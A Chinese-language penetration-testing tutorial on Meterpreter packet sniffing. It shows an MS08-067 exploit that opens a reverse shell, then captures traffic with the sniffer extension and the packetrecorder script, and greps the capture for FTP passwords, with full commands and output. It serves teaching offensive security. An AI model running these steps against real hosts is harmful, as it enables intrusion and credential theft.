Meterpreter能够在不接触硬盘的情况下嗅探远程主机的数据包。如果我们想监视正在发送的信息类型,这尤其有用,甚至更好,这可能是多个辅助模块的开始,这些模块最终将在捕获文件中查找敏感数据。嗅探器模块可以在环形缓冲区中存储多达200,000个数据包,并以标准PCAP格式导出它们,因此您可以使用psnuffle,dsniff,wireshark等对其进行处理。
我们首先向受害者发射远程攻击,并获得标准的反向Meterpreter控制台。
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 10.211.55.126 msf exploit(ms08_067_netapi) > set RHOST 10.10.1.119 msf exploit(ms08_067_netapi) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Triggering the vulnerability... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (205824 bytes) [*] Meterpreter session 1 opened (10.10.1.4:4444 -> 10.10.1.119:1921)
从这里,我们在接口2上启动嗅探器并开始收集数据包。然后,我们将嗅探器输出转储到/tmp/all.cap。
meterpreter > use sniffer Loading extension sniffer...success. meterpreter > help Sniffer Commands ================ Command Description ------- ----------- sniffer_dump Retrieve captured packet data sniffer_interfaces List all remote sniffable interfaces sniffer_start Capture packets on a previously opened interface sniffer_stats View statistics of an active capture sniffer_stop Stop packet captures on the specified interface meterpreter > sniffer_interfaces 1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false ) 2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:true wifi:false ) 3 - 'Intel(R) PRO/1000 MT Network Connection' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false ) meterpreter > sniffer_start 2 [*] Capture started on interface 2 (50000 packet buffer) meterpreter > sniffer_dump 2 /tmp/all.cap [*] Dumping packets from interface 2... [*] Wrote 19 packets to PCAP file /tmp/all.cap meterpreter > sniffer_stats 2 [*] Capture statistics for interface 2 packets: 4632 bytes: 1978363 meterpreter > sniffer_dump 2 /tmp/all.cap [*] Flushing packet capture buffer for interface 2... [*] Flushed 5537 packets (3523012 bytes) [*] Downloaded 014% (524288/3523012)... [*] Downloaded 029% (1048576/3523012)... [*] Downloaded 044% (1572864/3523012)... [*] Downloaded 059% (2097152/3523012)... [*] Downloaded 074% (2621440/3523012)... [*] Downloaded 089% (3145728/3523012)... [*] Downloaded 100% (3523012/3523012)... [*] Download completed, converting to PCAP... [-] Corrupted packet data (length:10359) [*] PCAP file written to /tmp/all.cap meterpreter > sniffer_stop 2 [*] Capture stopped on interface 2 [*] There are 279 packets (57849 bytes) remaining [*] Download or release them using 'sniffer_dump' or 'sniffer_release' meterpreter > sniffer_release 2 [*] Flushed 279 packets (57849 bytes) from interface 2 meterpreter >
现在,我们可以使用我们最喜欢的解析器或数据包分析工具来查看截获的信息。
Meterpreter数据包嗅探器使用MicroOLAP数据包嗅探器SDK,可以从受害计算机中嗅探数据包,而无需安装任何驱动程序或写入文件系统。该模块足够智能,可以实现自己的流量,并将自动从Meterpreter交互中删除任何流量。此外,Meterpreter通过SSL / TLS隧道传输所有信息,并经过完全加密。
封包记录器
作为使用嗅探器扩展名的替代方法,卡洛斯·佩雷斯(Carlos Perez)编写了packetrecorder Meterpreter脚本,该脚本可在捕获数据包时提供更多粒度。要查看可用的选项,我们发出不带任何参数的run packetrecorder命令。
meterpreter > run packetrecorder Meterpreter Script for capturing packets in to a PCAP file on a target host given a interface ID. OPTIONS: -h Help menu. -i Interface ID number where all packet capture will be done. -l Specify and alternate folder to save PCAP file. -li List interfaces that can be used for capture. -t Time interval in seconds between recollection of packet, default 30 seconds.
在开始嗅探流量之前,我们首先需要确定哪些接口对我们可用。
meterpreter > run packetrecorder -li 1 - 'Realtek RTL8139 Family PCI Fast Ethernet NIC' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false ) 2 - 'Citrix XenServer PV Ethernet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false ) 3 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
我们将开始在第二个界面上嗅探流量,将日志保存到我们的Kali系统的桌面上,并让嗅探器运行一段时间。
meterpreter > run packetrecorder -i 2 -l /root/ [*] Starting Packet capture on interface 2 [+] Packet capture started [*] Packets being saved in to /root/logs/packetrecorder/XEN-XP-SP2-BARE_20101119.5105/XEN-XP-SP2-BARE_20101119.5105.cap [*] Packet capture interval is 30 Seconds ^C [*] Interrupt [+] Stopping Packet sniffer... meterpreter >
现在有一个捕获文件等待着我们,可以在诸如Wireshark或tshark之类的工具中对其进行分析。我们将快速查看是否捕获了任何有趣的东西。
root@kali:~/logs/packetrecorder/XEN-XP-SP2-BARE_20101119.5105# tshark -r XEN-XP-SP2-BARE_20101119.5105.cap |grep PASS Running as user "root" and group "root". This could be dangerous. 2489 82.000000 192.168.1.201 -> 209.132.183.61 FTP Request: PASS s3cr3t 2685 96.000000 192.168.1.201 -> 209.132.183.61 FTP Request: PASS s3cr3t